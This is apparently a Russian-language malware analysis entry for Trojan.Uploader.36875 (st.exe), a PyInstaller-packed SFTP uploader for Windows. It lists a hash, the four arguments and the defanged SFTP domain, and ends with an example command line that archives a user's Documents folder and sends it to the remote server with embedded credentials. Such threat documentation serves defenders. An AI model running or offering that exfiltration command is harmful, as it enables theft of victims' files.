sha1:
- 903283f46df39c46d3be506fd99fdf61b6f0edeb (st.exe)
Упаковщик: PYINSTALLER
Описание
Троян, написанный на языке C++ и работающий на компьютерах под управлением ОС семейства Windows. Представляет собой утилиту (SFTP-клиент) для скачивания файлов и директорий с зараженных компьютеров.
Принцип действия
Вредоносная программа имеет 4 аргумента:
- sftp_server — сервер, куда будет отправлен заданный файл;
- sftp_user — SFTP-пользователь;
- sftp_password — пароль пользователя;
- folder_path — путь до целевых файла или директории, которые требуется скачать.
В качестве SFTP-сервера троян использует домен eu-central-1[.]sftpcloud[.]io.
Trojan.Uploader.36875 создает архив folder_backup.zip с искомой директорией и отправляет его на удаленный сервер.
Пример запуска трояна:
st.exe eu-central-1[.]sftpcloud[.]io 40433706825f4152a64f5fefbe1675d8 Nv6Rf4aL0E37jZRr2kHvgZomsTSUGi3h C:\Users\<user_name>\Documents\tda